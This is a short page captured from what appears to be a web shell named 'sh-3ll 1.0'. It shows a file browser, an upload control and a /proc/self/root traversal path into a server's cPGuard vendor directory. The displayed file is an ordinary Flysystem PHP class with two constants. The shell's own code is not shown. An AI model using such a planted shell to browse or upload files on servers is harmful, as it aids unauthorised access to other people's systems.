HOME


sh-3ll 1.0
DIR:/proc/self/root/proc/thread-self/root/opt/cpguard/app/vendor/league/flysystem/src/
Upload File :
Current File : //proc/self/root/proc/thread-self/root/opt/cpguard/app/vendor/league/flysystem/src/Visibility.php
<?php

declare(strict_types=1);

namespace League\Flysystem;

final class Visibility
{
    public const PUBLIC = 'public';
    public const PRIVATE = 'private';
}